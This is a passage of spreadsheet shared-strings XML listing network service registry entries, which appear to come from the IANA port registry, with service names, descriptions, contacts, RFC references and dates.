    <t>Spaceway Dialer</t>
  </si>
  <si>
    <t>idps</t>
  </si>
  <si>
    <t>[Jean_Francois_Rabass]</t>
  </si>
  <si>
    <t>minilock</t>
  </si>
  <si>
    <t>Minilock</t>
  </si>
  <si>
    <t>[Daniel_Julio_Reyes]</t>
  </si>
  <si>
    <t>2003-08</t>
  </si>
  <si>
    <t>radius-dynauth</t>
  </si>
  <si>
    <t>RADIUS Dynamic Authorization</t>
  </si>
  <si>
    <t>[RFC3576]</t>
  </si>
  <si>
    <t>pwgpsi</t>
  </si>
  <si>
    <t>Print Services Interface</t>
  </si>
  <si>
    <t>[Harry_Lewis]</t>
  </si>
  <si>
    <t>ibm-mgr</t>
  </si>
  <si>
    <t>ibm manager service</t>
  </si>
  <si>
    <t>[Tim_Hahn]</t>
  </si>
  <si>
    <t>vhd</t>
  </si>
  <si>
    <t>VHD</t>
  </si>
  <si>
    <t>[Chris_Duncombe]</t>
  </si>
  <si>
    <t>soniqsync</t>
  </si>
  <si>
    <t>SoniqSync</t>
  </si>
  <si>
    <t>[Ryan_Melville]</t>
  </si>
  <si>
    <t>2004-01</t>
  </si>
  <si>
    <t>iqnet-port</t>
  </si>
  <si>
    <t>Harman IQNet Port</t>
  </si>
  <si>
    <t>[Bruce_Vander_Werf]</t>
  </si>
  <si>
    <t>tcpdataserver</t>
  </si>
  <si>
    <t>ThorGuard Server Port</t>
  </si>
  <si>
    <t>[Joel_E_Steiger]</t>
  </si>
  <si>
    <t>wsmlb</t>
  </si>
  <si>
    <t>Remote System Manager</t>
  </si>
  <si>
    <t>[Thomas_Fiege]</t>
  </si>
  <si>
    <t>spugna</t>
  </si>
  <si>
    <t>SpuGNA Communication Port</t>
  </si>
  <si>
    <t>[Samuele_Sequi]</t>
  </si>
  <si>
    <t>sun-as-iiops-ca</t>
  </si>
  <si>
    <t>Sun App Svr-IIOPClntAuth</t>
  </si>
  <si>
    <t>apocd</t>
  </si>
  <si>
    <t>Java Desktop System Configuration Agent</t>
  </si>
  <si>
    <t>[Geoff_Higgins]</t>
  </si>
  <si>
    <t>wlanauth</t>
  </si>
  <si>
    <t>WLAN AS server</t>
  </si>
  <si>
    <t>[Bianling_Zhang]</t>
  </si>
  <si>
    <t>amp</t>
  </si>
  <si>
    <t>AMP</t>
  </si>
  <si>
    <t>[Northon_Rodrigues]</t>
  </si>
  <si>
    <t>neto-wol-server</t>
  </si>
  <si>
    <t>netO WOL Server</t>
  </si>
  <si>
    <t>[Martin_Bestmann_2]</t>
  </si>
  <si>
    <t>2004-03</t>
  </si>
  <si>
    <t>rap-ip</t>
  </si>
  <si>
    <t>Rhapsody Interface Protocol</t>
  </si>
  <si>
    <t>[Paul_Zander]</t>
  </si>
  <si>
    <t>neto-dcs</t>
  </si>
  <si>
    <t>netO DCS</t>
  </si>
  <si>
    <t>lansurveyorxml</t>
  </si>
  <si>
    <t>LANsurveyor XML</t>
  </si>
  <si>
    <t>[Michael_Swan]</t>
  </si>
  <si>
    <t>sunlps-http</t>
  </si>
  <si>
    <t>Sun Local Patch Server</t>
  </si>
  <si>
    <t>[Barry_Greenberg]</t>
  </si>
  <si>
    <t>tapeware</t>
  </si>
  <si>
    <t>Yosemite Tech Tapeware</t>
  </si>
  <si>
    <t>[Luke_Dion]</t>
  </si>
  <si>
    <t>crinis-hb</t>
  </si>
  <si>
    <t>Crinis Heartbeat</t>
  </si>
  <si>
    <t>[Eric_McMurry]</t>
  </si>
  <si>
    <t>epl-slp</t>
  </si>
  <si>
    <t>EPL Sequ Layer Protocol</t>
  </si>
  <si>
    <t>[Hans_Weibel]</t>
  </si>
  <si>
    <t>2004-10</t>
  </si>
  <si>
    <t>scp</t>
  </si>
  <si>
    <t>Siemens AuD SCP</t>
  </si>
  <si>
    <t>[Johann_Arnold]</t>
  </si>
  <si>
    <t>pmcp</t>
  </si>
  <si>
    <t>ATSC PMCP Standard</t>
  </si>
  <si>
    <t>[Graham_Jones]</t>
  </si>
  <si>
    <t>acp-discovery</t>
  </si>
  <si>
    <t>Compute Pool Discovery</t>
  </si>
  <si>
    <t>acp-conduit</t>
  </si>
  <si>
    <t>Compute Pool Conduit</t>
  </si>
  <si>
    <t>acp-policy</t>
  </si>
  <si>
    <t>Compute Pool Policy</t>
  </si>
  <si>
    <t>[Andy_Belk_2]</t>
  </si>
  <si>
    <t>ffserver</t>
  </si>
  <si>
    <t>Antera FlowFusion Process Simulation</t>
  </si>
  <si>
    <t>[Armin_Liebchen]</t>
  </si>
  <si>
    <t>warmux</t>
  </si>
  <si>
    <t>WarMUX game server</t>
  </si>
  <si>
    <t>[Christophe_Gisquet]</t>
  </si>
  <si>
    <t>netmpi</t>
  </si>
  <si>
    <t>Netadmin Systems MPI service</t>
  </si>
  <si>
    <t>[G_Runfeldt]</t>
  </si>
  <si>
    <t>neteh</t>
  </si>
  <si>
    <t>Netadmin Systems Event Handler</t>
  </si>
  <si>
    <t>neteh-ext</t>
  </si>
  <si>
    <t>Netadmin Systems Event Handler External</t>
  </si>
  <si>
    <t>[Jonas_Krogell]</t>
  </si>
  <si>
    <t>cernsysmgmtagt</t>
  </si>
  <si>
    <t>Cerner System Management Agent</t>
  </si>
  <si>
    <t>[Mike_Craft]</t>
  </si>
  <si>
    <t>dvapps</t>
  </si>
  <si>
    <t>Docsvault Application Service</t>
  </si>
  <si>
    <t>[Ketul_Patel]</t>
  </si>
  <si>
    <t>2006-10</t>
  </si>
  <si>
    <t>xxnetserver</t>
  </si>
  <si>
    <t>xxNETserver</t>
  </si>
  <si>
    <t>[XXT_LLC]</t>
  </si>
  <si>
    <t>[Matt_Ferrari]</t>
  </si>
  <si>
    <t>aipn-auth</t>
  </si>
  <si>
    <t>AIPN LS Authentication</t>
  </si>
  <si>
    <t>[Qiang_Zhang]</t>
  </si>
  <si>
    <t>spectardata</t>
  </si>
  <si>
    <t>Spectar Data Stream Service</t>
  </si>
  <si>
    <t>spectardb</t>
  </si>
  <si>
    <t>Spectar Database Rights Service</t>
  </si>
  <si>
    <t>[Jan_Rutger_Voorhorst]</t>
  </si>
  <si>
    <t>markem-dcp</t>
  </si>
  <si>
    <t>MARKEM NEXTGEN DCP</t>
  </si>
  <si>
    <t>mkm-discovery</t>
  </si>
  <si>
    <t>MARKEM Auto-Discovery</t>
  </si>
  <si>
    <t>[Vadym_Kargin]</t>
  </si>
  <si>
    <t>sos</t>
  </si>
  <si>
    <t>Scito Object Server</t>
  </si>
  <si>
    <t>[Arno_Klaassen]</t>
  </si>
  <si>
    <t>amx-rms</t>
  </si>
  <si>
    <t>AMX Resource Management Suite</t>
  </si>
  <si>
    <t>[Ron_Barber]</t>
  </si>
  <si>
    <t>flirtmitmir</t>
  </si>
  <si>
    <t>www.FlirtMitMir.de</t>
  </si>
  <si>
    <t>[Carsten_Falticska]</t>
  </si>
  <si>
    <t>shiprush-db-svr</t>
  </si>
  <si>
    <t>ShipRush Database Server</t>
  </si>
  <si>
    <t>[Z-Firm_LLC]</t>
  </si>
  <si>
    <t>[Rafael_Zimberoff]</t>
  </si>
  <si>
    <t>nhci</t>
  </si>
  <si>
    <t>NHCI status port</t>
  </si>
  <si>
    <t>[Eric_Welch_2]</t>
  </si>
  <si>
    <t>quest-agent</t>
  </si>
  <si>
    <t>Quest Common Agent</t>
  </si>
  <si>
    <t>[Peter_Maher]</t>
  </si>
  <si>
    <t>rnm</t>
  </si>
  <si>
    <t>RNM</t>
  </si>
  <si>
    <t>[sn_w_of_renegade_lab]</t>
  </si>
  <si>
    <t>v-one-spp</t>
  </si>
  <si>
    <t>V-ONE Single Port Proxy</t>
  </si>
  <si>
    <t>[Daniel_Becker_3]</t>
  </si>
  <si>
    <t>an-pcp</t>
  </si>
  <si>
    <t>Astare Network PCP</t>
  </si>
  <si>
    <t>[Tony_Gulino]</t>
  </si>
  <si>
    <t>msfw-control</t>
  </si>
  <si>
    <t>MS Firewall Control</t>
  </si>
  <si>
    <t>[Oren_Trutner]</t>
  </si>
  <si>
    <t>item</t>
  </si>
  <si>
    <t>IT Environmental Monitor</t>
  </si>
  <si>
    <t>[Keith_Wright]</t>
  </si>
  <si>
    <t>spw-dnspreload</t>
  </si>
  <si>
    <t>SPACEWAY DNS Preload</t>
  </si>
  <si>
    <t>[Daniel_Friedman]</t>
  </si>
  <si>
    <t>qtms-bootstrap</t>
  </si>
  <si>
    <t>QTMS Bootstrap Protocol</t>
  </si>
  <si>
    <t>[Phil_Willis]</t>
  </si>
  <si>
    <t>spectraport</t>
  </si>
  <si>
    <t>SpectraTalk Port</t>
  </si>
  <si>
    <t>[Madhav_Karhade]</t>
  </si>
  <si>
    <t>sse-app-config</t>
  </si>
  <si>
    <t>SSE App Configuration</t>
  </si>
  <si>
    <t>[Tim_Wilson]</t>
  </si>
  <si>
    <t>sscan</t>
  </si>
  <si>
    <t>SONY scanning protocol</t>
  </si>
  <si>
    <t>[Takashi_Aihara]</t>
  </si>
  <si>
    <t>stryker-com</t>
  </si>
  <si>
    <t>Stryker Comm Port</t>
  </si>
  <si>
    <t>[Andrew_Schultz]</t>
  </si>
  <si>
    <t>opentrac</t>
  </si>
  <si>
    <t>OpenTRAC</t>
  </si>
  <si>
    <t>[Scott_Miller]</t>
  </si>
  <si>
    <t>informer</t>
  </si>
  <si>
    <t>INFORMER</t>
  </si>
  <si>
    <t>[Filippo_Fadda]</t>
  </si>
  <si>
    <t>trap-port</t>
  </si>
  <si>
    <t>Trap Port</t>
  </si>
  <si>
    <t>trap-port-mom</t>
  </si>
  <si>
    <t>Trap Port MOM</t>
  </si>
  <si>
    <t>nav-port</t>
  </si>
  <si>
    <t>Navini Port</t>
  </si>
  <si>
    <t>[Chris_Sanders]</t>
  </si>
  <si>
    <t>sasp</t>
  </si>
  <si>
    <t>Server/Application State Protocol (SASP)</t>
  </si>
  <si>
    <t>[Alan_Bivens]</t>
  </si>
  <si>
    <t>winshadow-hd</t>
  </si>
  <si>
    <t>winShadow Host Discovery</t>
  </si>
  <si>
    <t>[Shu_Wei_Tan]</t>
  </si>
  <si>
    <t>giga-pocket</t>
  </si>
  <si>
    <t>GIGA-POCKET</t>
  </si>
  <si>
    <t>[Yoshikazu_Watanabe]</t>
  </si>
  <si>
    <t>asap-tcp</t>
  </si>
  <si>
    <t>asap tcp port</t>
  </si>
  <si>
    <t>asap-udp</t>
  </si>
  <si>
    <t>asap udp port</t>
  </si>
  <si>
    <t>[RFC5352]</t>
  </si>
  <si>
    <t>asap-sctp</t>
  </si>
  <si>
    <t>asap sctp</t>
  </si>
  <si>
    <t>asap-tcp-tls</t>
  </si>
  <si>
    <t>asap/tls tcp port</t>
  </si>
  <si>
    <t>This entry has been removed on 2006-06-23.</t>
  </si>
  <si>
    <t>asap-sctp-tls</t>
  </si>
  <si>
    <t>asap-sctp/tls</t>
  </si>
  <si>
    <t>xpl</t>
  </si>
  <si>
    <t>xpl automation protocol</t>
  </si>
  <si>
    <t>[Ian_Lowe]</t>
  </si>
  <si>
    <t>dzdaemon</t>
  </si>
  <si>
    <t>Sun SDViz DZDAEMON Port</t>
  </si>
  <si>
    <t>[Kevin_Rushforth]</t>
  </si>
  <si>
    <t>dzoglserver</t>
  </si>
  <si>
    <t>Sun SDViz DZOGLSERVER Port</t>
  </si>
  <si>
    <t>diameter</t>
  </si>
  <si>
    <t>DIAMETER</t>
  </si>
  <si>
    <t>[RFC3588]</t>
  </si>
  <si>
    <t>ovsam-mgmt</t>
  </si>
  <si>
    <t>hp OVSAM MgmtServer Disco</t>
  </si>
  <si>
    <t>[Mike_Pontillo]</t>
  </si>
  <si>
    <t>ovsam-d-agent</t>
  </si>
  <si>
    <t>hp OVSAM HostAgent Disco</t>
  </si>
  <si>
    <t>avocent-adsap</t>
  </si>
  <si>
    <t>Avocent DS Authorization</t>
  </si>
  <si>
    <t>[Eduardo_Fernandez]</t>
  </si>
  <si>
    <t>oem-agent</t>
  </si>
  <si>
    <t>OEM Agent</t>
  </si>
  <si>
    <t>[Narain_Jagathesan]</t>
  </si>
  <si>
    <t>fagordnc</t>
  </si>
  <si>
    <t>[Luis_Zugasti]</t>
  </si>
  <si>
    <t>sixxsconfig</t>
  </si>
  <si>
    <t>SixXS Configuration</t>
  </si>
  <si>
    <t>pnbscada</t>
  </si>
  <si>
    <t>PNBSCADA</t>
  </si>
  <si>
    <t>[Philip_N_Bergstress]</t>
  </si>
  <si>
    <t>dl-agent</t>
  </si>
  <si>
    <t>DirectoryLockdown Agent
IANA assigned this well-formed service name as a replacement for "dl_agent".</t>
  </si>
  <si>
    <t>dl_agent</t>
  </si>
  <si>
    <t>DirectoryLockdown Agent</t>
  </si>
  <si>
    <t>This entry is an alias to "dl-agent".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>xmpcr-interface</t>
  </si>
  <si>
    <t>XMPCR Interface Port</t>
  </si>
  <si>
    <t>[Christopher_Carlson]</t>
  </si>
  <si>
    <t>2003-10</t>
  </si>
  <si>
    <t>fotogcad</t>
  </si>
  <si>
    <t>FotoG CAD interface</t>
  </si>
  <si>
    <t>[Jason_Szabo]</t>
  </si>
  <si>
    <t>appss-lm</t>
  </si>
  <si>
    <t>appss license manager</t>
  </si>
  <si>
    <t>[Peter_Krueger]</t>
  </si>
  <si>
    <t>igrs</t>
  </si>
  <si>
    <t>IGRS</t>
  </si>
  <si>
    <t>[Huang_Jingnan]</t>
  </si>
  <si>
    <t>idac</t>
  </si>
  <si>
    <t>Data Acquisition and Control</t>
  </si>
  <si>
    <t>[Chatziandreoglou_Chr]</t>
  </si>
  <si>
    <t>msdts1</t>
  </si>
  <si>
    <t>DTS Service Port</t>
  </si>
  <si>
    <t>[Sergei_Ivanov]</t>
  </si>
  <si>
    <t>vrpn</t>
  </si>
  <si>
    <t>VR Peripheral Network</t>
  </si>
  <si>
    <t>[Sensics]</t>
  </si>
  <si>
    <t>[Yuval_Boger]</t>
  </si>
  <si>
    <t>softrack-meter</t>
  </si>
  <si>
    <t>SofTrack Metering</t>
  </si>
  <si>
    <t>[John_T_McCann]</t>
  </si>
  <si>
    <t>topflow-ssl</t>
  </si>
  <si>
    <t>TopFlow SSL</t>
  </si>
  <si>
    <t>[Ken_Nelson]</t>
  </si>
  <si>
    <t>nei-management</t>
  </si>
  <si>
    <t>NEI management port</t>
  </si>
  <si>
    <t>[Kevin_Murphy_2]</t>
  </si>
  <si>
    <t>ciphire-data</t>
  </si>
  <si>
    <t>Ciphire Data Transport</t>
  </si>
  <si>
    <t>[Lars_Eilebrecht]</t>
  </si>
  <si>
    <t>ciphire-serv</t>
  </si>
  <si>
    <t>Ciphire Services</t>
  </si>
  <si>
    <t>dandv-tester</t>
  </si>
  <si>
    <t>D and V Tester Control Port</t>
  </si>
  <si>
    <t>[Voiko_Loukanov]</t>
  </si>
  <si>
    <t>ndsconnect</t>
  </si>
  <si>
    <t>Niche Data Server Connect</t>
  </si>
  <si>
    <t>[Roland_Schneider]</t>
  </si>
  <si>
    <t>rtc-pm-port</t>
  </si>
  <si>
    <t>Oracle RTC-PM port</t>
  </si>
  <si>
    <t>[PV_Shivkumar]</t>
  </si>
  <si>
    <t>pcc-image-port</t>
  </si>
  <si>
    <t>PCC-image-port</t>
  </si>
  <si>
    <t>[Shiro_Tamoto]</t>
  </si>
  <si>
    <t>cgi-starapi</t>
  </si>
  <si>
    <t>CGI StarAPI Server</t>
  </si>
  <si>
    <t>[Garry_Moore]</t>
  </si>
  <si>
    <t>syam-agent</t>
  </si>
  <si>
    <t>SyAM Agent Port</t>
  </si>
  <si>
    <t>[Michael_Daniele]</t>
  </si>
  <si>
    <t>syam-smc</t>
  </si>
  <si>
    <t>SyAm SMC Service Port</t>
  </si>
  <si>
    <t>sdo-tls</t>
  </si>
  <si>
    <t>Simple Distributed Objects over TLS</t>
  </si>
  <si>
    <t>sdo-ssh</t>
  </si>
  <si>
    <t>Simple Distributed Objects over SSH</t>
  </si>
  <si>
    <t>senip</t>
  </si>
  <si>
    <t>IAS, Inc. SmartEye NET Internet Protocol</t>
  </si>
  <si>
    <t>[Matt_Nowicki]</t>
  </si>
  <si>
    <t>itv-control</t>
  </si>
  <si>
    <t>ITV Port</t>
  </si>
  <si>
    <t>[Alex_Nicu]</t>
  </si>
  <si>
    <t>Unidata UDT OS
IANA assigned this well-formed service name as a replacement for "udt_os".</t>
  </si>
  <si>
    <t>Unidata UDT OS</t>
  </si>
  <si>
    <t>nimsh</t>
  </si>
  <si>
    <t>NIM Service Handler</t>
  </si>
  <si>
    <t>[Paul_B_Finley]</t>
  </si>
  <si>
    <t>nimaux</t>
  </si>
  <si>
    <t>NIMsh Auxiliary Port</t>
  </si>
  <si>
    <t>charsetmgr</t>
  </si>
  <si>
    <t>CharsetMGR</t>
  </si>
  <si>
    <t>[Tatsuya_Ueda]</t>
  </si>
  <si>
    <t>omnilink-port</t>
  </si>
  <si>
    <t>Arnet Omnilink Port</t>
  </si>
  <si>
    <t>[Ronen_Shaul]</t>
  </si>
  <si>
    <t>mupdate</t>
  </si>
  <si>
    <t>Mailbox Update (MUPDATE) protocol</t>
  </si>
  <si>
    <t>[RFC3656]</t>
  </si>
  <si>
    <t>topovista-data</t>
  </si>
  <si>
    <t>TopoVista elevation data</t>
  </si>
  <si>
    <t>[Gregg_Townsend]</t>
  </si>
  <si>
    <t>imoguia-port</t>
  </si>
  <si>
    <t>Imoguia Port</t>
  </si>
  <si>
    <t>[Emidio_Cunha]</t>
  </si>
  <si>
    <t>hppronetman</t>
  </si>
  <si>
    <t>HP Procurve NetManagement</t>
  </si>
  <si>
    <t>[Devon_Dawson]</t>
  </si>
  <si>
    <t>surfcontrolcpa</t>
  </si>
  <si>
    <t>SurfControl CPA</t>
  </si>
  <si>
    <t>[Hywel_Morgan]</t>
  </si>
  <si>
    <t>prnrequest</t>
  </si>
  <si>
    <t>Printer Request Port</t>
  </si>
  <si>
    <t>[Brett_Green]</t>
  </si>
  <si>
    <t>prnstatus</t>
  </si>
  <si>
    <t>Printer Status Port</t>
  </si>
  <si>
    <t>gbmt-stars</t>
  </si>
  <si>
    <t>Global Maintech Stars</t>
  </si>
  <si>
    <t>[Harry_Goldschmitt]</t>
  </si>
  <si>
    <t>listcrt-port</t>
  </si>
  <si>
    <t>ListCREATOR Port</t>
  </si>
  <si>
    <t>[Tomokazu_Asai]</t>
  </si>
  <si>
    <t>listcrt-port-2</t>
  </si>
  <si>
    <t>ListCREATOR Port 2</t>
  </si>
  <si>
    <t>agcat</t>
  </si>
  <si>
    <t>Auto-Graphics Cataloging</t>
  </si>
  <si>
    <t>[Paul_Cope]</t>
  </si>
  <si>
    <t>wysdmc</t>
  </si>
  <si>
    <t>WysDM Controller</t>
  </si>
  <si>
    <t>[Jim_McDonald_2]</t>
  </si>
  <si>
    <t>aftmux</t>
  </si>
  <si>
    <t>AFT multiplex port</t>
  </si>
  <si>
    <t>[Alfred_Schmidt]</t>
  </si>
  <si>
    <t>pktcablemmcops</t>
  </si>
  <si>
    <t>PacketCableMultimediaCOPS</t>
  </si>
  <si>
    <t>[Eric_Rosenfeld]</t>
  </si>
  <si>
    <t>hyperip</t>
  </si>
  <si>
    <t>HyperIP</t>
  </si>
  <si>
    <t>[Network_Executive_Software_Inc]</t>
  </si>
  <si>
    <t>[Nancy_Golio]</t>
  </si>
  <si>
    <t>exasoftport1</t>
  </si>
  <si>
    <t>Exasoft IP Port</t>
  </si>
  <si>
    <t>[Alan_Malik]</t>
  </si>
  <si>
    <t>herodotus-net</t>
  </si>
  <si>
    <t>Herodotus Net</t>
  </si>
  <si>
    <t>[Adam_Gawne_Cain]</t>
  </si>
  <si>
    <t>sor-update</t>
  </si>
  <si>
    <t>Soronti Update Port</t>
  </si>
  <si>
    <t>[Carleton_Watkins]</t>
  </si>
  <si>
    <t>symb-sb-port</t>
  </si>
  <si>
    <t>Symbian Service Broker</t>
  </si>
  <si>
    <t>[Ian_McDowall]</t>
  </si>
  <si>
    <t>mpl-gprs-port</t>
  </si>
  <si>
    <t>MPL_GPRS_PORT</t>
  </si>
  <si>
    <t>[David_Barrass_2]</t>
  </si>
  <si>
    <t>MPL_GPRS_Port</t>
  </si>
  <si>
    <t>zmp</t>
  </si>
  <si>
    <t>Zoran Media Port</t>
  </si>
  <si>
    <t>[Gerard_Cerchio]</t>
  </si>
  <si>
    <t>winport</t>
  </si>
  <si>
    <t>WINPort</t>
  </si>
  <si>
    <t>[Alwin_Egger]</t>
  </si>
  <si>
    <t>natdataservice</t>
  </si>
  <si>
    <t>ScsTsr</t>
  </si>
  <si>
    <t>[Ghanshyam_Patel]</t>
  </si>
  <si>
    <t>netboot-pxe</t>
  </si>
  <si>
    <t>PXE NetBoot Manager</t>
  </si>
  <si>
    <t>[Markus_Treinen]</t>
  </si>
  <si>
    <t>smauth-port</t>
  </si>
  <si>
    <t>AMS Port</t>
  </si>
  <si>
    <t>[Angelique_Dokos]</t>
  </si>
  <si>
    <t>syam-webserver</t>
  </si>
  <si>
    <t>Syam Web Server Port</t>
  </si>
  <si>
    <t>msr-plugin-port</t>
  </si>
  <si>
    <t>MSR Plugin Port</t>
  </si>
  <si>
    <t>[Ron_Steed]</t>
  </si>
  <si>
    <t>dyn-site</t>
  </si>
  <si>
    <t>Dynamic Site System</t>
  </si>
  <si>
    <t>[Steve_Qi]</t>
  </si>
  <si>
    <t>plbserve-port</t>
  </si>
  <si>
    <t>PL/B App Server User Port</t>
  </si>
  <si>
    <t>[Edward_R_Boedecker]</t>
  </si>
  <si>
    <t>sunfm-port</t>
  </si>
  <si>
    <t>PL/B File Manager Port</t>
  </si>
  <si>
    <t>sdp-portmapper</t>
  </si>
  <si>
    <t>SDP Port Mapper Protocol</t>
  </si>
  <si>
    <t>[James_Pinkerton]</t>
  </si>
  <si>
    <t>mailprox</t>
  </si>
  <si>
    <t>Mailprox</t>
  </si>
  <si>
    <t>[Christof_Drescher]</t>
  </si>
  <si>
    <t>dvbservdsc</t>
  </si>
  <si>
    <t>DVB Service Discovery</t>
  </si>
  <si>
    <t>[Bert_van_Willigen][Peter_MacAvock]</t>
  </si>
  <si>
    <t>dbcontrol-agent</t>
  </si>
  <si>
    <t>Oracle dbControl Agent po
IANA assigned this well-formed service name as a replacement for "dbcontrol_agent".</t>
  </si>
  <si>
    <t>dbcontrol_agent</t>
  </si>
  <si>
    <t>Oracle dbControl Agent po</t>
  </si>
  <si>
    <t>This entry is an alias to "dbcontrol-agent".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>aamp</t>
  </si>
  <si>
    <t>Anti-virus Application Management Port</t>
  </si>
  <si>
    <t>[In_sik_Choi]</t>
  </si>
  <si>
    <t>xecp-node</t>
  </si>
  <si>
    <t>XeCP Node Service</t>
  </si>
  <si>
    <t>[Brent_McCullough]</t>
  </si>
  <si>
    <t>homeportal-web</t>
  </si>
  <si>
    <t>Home Portal Web Server</t>
  </si>
  <si>
    <t>[Christian_Beaumont]</t>
  </si>
  <si>
    <t>srdp</t>
  </si>
  <si>
    <t>satellite distribution</t>
  </si>
  <si>
    <t>[Simone_Molendini]</t>
  </si>
  <si>
    <t>tig</t>
  </si>
  <si>
    <t>TetraNode Ip Gateway</t>
  </si>
  <si>
    <t>[B_van_Klinken]</t>
  </si>
  <si>
    <t>2003-12</t>
  </si>
  <si>
    <t>sops</t>
  </si>
  <si>
    <t>S-Ops Management</t>
  </si>
  <si>
    <t>[Stefan_Hochuli]</t>
  </si>
  <si>
    <t>emcads</t>
  </si>
  <si>
    <t>EMCADS Server Port</t>
  </si>
  <si>
    <t>[Lars_Struwe_Christen]</t>
  </si>
  <si>
    <t>backupedge</t>
  </si>
  <si>
    <t>BackupEDGE Server</t>
  </si>
  <si>
    <t>[Microlite_Corporation]</t>
  </si>
  <si>
    <t>[D_Thomas_Podnar]</t>
  </si>
  <si>
    <t>ccp</t>
  </si>
  <si>
    <t>Connect and Control Protocol for Consumer, Commercial, and Industrial Electronic Devices</t>
  </si>
  <si>
    <t>[Aaron_Myer]</t>
  </si>
  <si>
    <t>apdap</t>
  </si>
  <si>
    <t>Anton Paar Device Administration Protocol</t>
  </si>
  <si>
    <t>[Martin_Leitner]</t>
  </si>
  <si>
    <t>drip</t>
  </si>
  <si>
    <t>Dynamic Routing Information Protocol</t>
  </si>
  <si>
    <t>[Dana_Blair]</t>
  </si>
  <si>
    <t>namemunge</t>
  </si>
  <si>
    <t>Name Munging</t>
  </si>
  <si>
    <t>[John_C_Klensin]</t>
  </si>
  <si>
    <t>2004-07</t>
  </si>
  <si>
    <t>pwgippfax</t>
  </si>
  <si>
    <t>PWG IPP Facsimile</t>
  </si>
  <si>
    <t>[Ira_McDonald]</t>
  </si>
  <si>
    <t>2004-08</t>
  </si>
  <si>
    <t>i3-sessionmgr</t>
  </si>
  <si>
    <t>I3 Session Manager</t>
  </si>
  <si>
    <t>xmlink-connect</t>
  </si>
  <si>
    <t>Eydeas XMLink Connect</t>
  </si>
  <si>
    <t>[David_Crewson]</t>
  </si>
  <si>
    <t>2004-09</t>
  </si>
  <si>
    <t>adrep</t>
  </si>
  <si>
    <t>AD Replication RPC</t>
  </si>
  <si>
    <t>[Robert_Ball]</t>
  </si>
  <si>
    <t>p2pcommunity</t>
  </si>
  <si>
    <t>p2pCommunity</t>
  </si>
  <si>
    <t>[Tiago_Bittencourt_Si]</t>
  </si>
  <si>
    <t>gvcp</t>
  </si>
  <si>
    <t>GigE Vision Control</t>
  </si>
  <si>
    <t>[Eric_Carey]</t>
  </si>
  <si>
    <t>mqe-broker</t>
  </si>
  <si>
    <t>MQEnterprise Broker</t>
  </si>
  <si>
    <t>mqe-agent</t>
  </si>
  <si>
    <t>MQEnterprise Agent</t>
  </si>
  <si>
    <t>[Bob_Lauria]</t>
  </si>
  <si>
    <t>treehopper</t>
  </si>
  <si>
    <t>Tree Hopper Networking</t>
  </si>
  <si>
    <t>[Gary_Whelan]</t>
  </si>
  <si>
    <t>bess</t>
  </si>
  <si>
    <t>Bess Peer Assessment</t>
  </si>
  <si>
    <t>[Peter_Verdon]</t>
  </si>
  <si>
    <t>proaxess</t>
  </si>
  <si>
    <t>ProAxess Server</t>
  </si>
  <si>
    <t>[Jonas_Ahlqvist]</t>
  </si>
  <si>
    <t>sbi-agent</t>
  </si>
  <si>
    <t>SBI Agent Protocol</t>
  </si>
  <si>
    <t>[Yossi_Appleboum_2]</t>
  </si>
  <si>
    <t>thrp</t>
  </si>
  <si>
    <t>Teran Hybrid Routing Protocol</t>
  </si>
  <si>
    <t>[Spencer_Teran]</t>
  </si>
  <si>
    <t>sasggprs</t>
  </si>
  <si>
    <t>SASG GPRS</t>
  </si>
  <si>
    <t>[Cristian_Petculescu_3]</t>
  </si>
  <si>
    <t>ati-ip-to-ncpe</t>
  </si>
  <si>
    <t>Avanti IP to NCPE API</t>
  </si>
  <si>
    <t>[Steve_Meyer_Sr]</t>
  </si>
  <si>
    <t>bflckmgr</t>
  </si>
  <si>
    <t>BuildForge Lock Manager</t>
  </si>
  <si>
    <t>[Joe_Senner]</t>
  </si>
  <si>
    <t>ppsms</t>
  </si>
  <si>
    <t>PPS Message Service</t>
  </si>
  <si>
    <t>[Bart_Schaefer]</t>
  </si>
  <si>
    <t>ianywhere-dbns</t>
  </si>
  <si>
    <t>iAnywhere DBNS</t>
  </si>
  <si>
    <t>[Graeme_Perrow]</t>
  </si>
  <si>
    <t>landmarks</t>
  </si>
  <si>
    <t>Landmark Messages</t>
  </si>
  <si>
    <t>[Petri_Rauhala]</t>
  </si>
  <si>
    <t>lanrevagent</t>
  </si>
  <si>
    <t>LANrev Agent</t>
  </si>
  <si>
    <t>[Martin_Bestmann_3]</t>
  </si>
  <si>
    <t>Defined TXT keys:
  txtvers
  server=&lt;main LANrev server for agent&gt;
  vers=&lt;version of LANrev Agent&gt;
  build=&lt;build number of LANrev Agent&gt;
  id=&lt;agent identifier&gt;</t>
  </si>
  <si>
    <t>lanrevserver</t>
  </si>
  <si>
    <t>LANrev Server</t>
  </si>
  <si>
    <t>iconp</t>
  </si>
  <si>
    <t>ict-control Protocol</t>
  </si>
  <si>
    <t>[Roel_Harbers]</t>
  </si>
  <si>
    <t>progistics</t>
  </si>
  <si>
    <t>ConnectShip Progistics</t>
  </si>
  <si>
    <t>[ConnectShip_Inc]</t>
  </si>
  <si>
    <t>[Robert_Kinyon]</t>
  </si>
  <si>
    <t>citysearch</t>
  </si>
  <si>
    <t>Remote Applicant Tracking Service</t>
  </si>
  <si>
    <t>[Marc_Castelluccio]</t>
  </si>
  <si>
    <t>airshot</t>
  </si>
  <si>
    <t>Air Shot</t>
  </si>
  <si>
    <t>[Shingo_Kimura]</t>
  </si>
  <si>
    <t>opswagent</t>
  </si>
  <si>
    <t>Server Automation Agent</t>
  </si>
  <si>
    <t>[Hewlett_Packard_Enterprise]</t>
  </si>
  <si>
    <t>[Cristi_Fati]</t>
  </si>
  <si>
    <t>opswmanager</t>
  </si>
  <si>
    <t>Opsware Manager</t>
  </si>
  <si>
    <t>[Dave_Jagoda]</t>
  </si>
  <si>
    <t>secure-cfg-svr</t>
  </si>
  <si>
    <t>Secured Configuration Server</t>
  </si>
  <si>
    <t>[Dr_Anupam_Bharali]</t>
  </si>
  <si>
    <t>smwan</t>
  </si>
  <si>
    <t>Smith Micro Wide Area Network Service</t>
  </si>
  <si>
    <t>[David_Sperling]</t>
  </si>
  <si>
    <t>acms</t>
  </si>
  <si>
    <t>Aircraft Cabin Management System</t>
  </si>
  <si>
    <t>[Dustin_Zack]</t>
  </si>
  <si>
    <t>starfish</t>
  </si>
  <si>
    <t>Starfish System Admin</t>
  </si>
  <si>
    <t>[Dan_Razzell]</t>
  </si>
  <si>
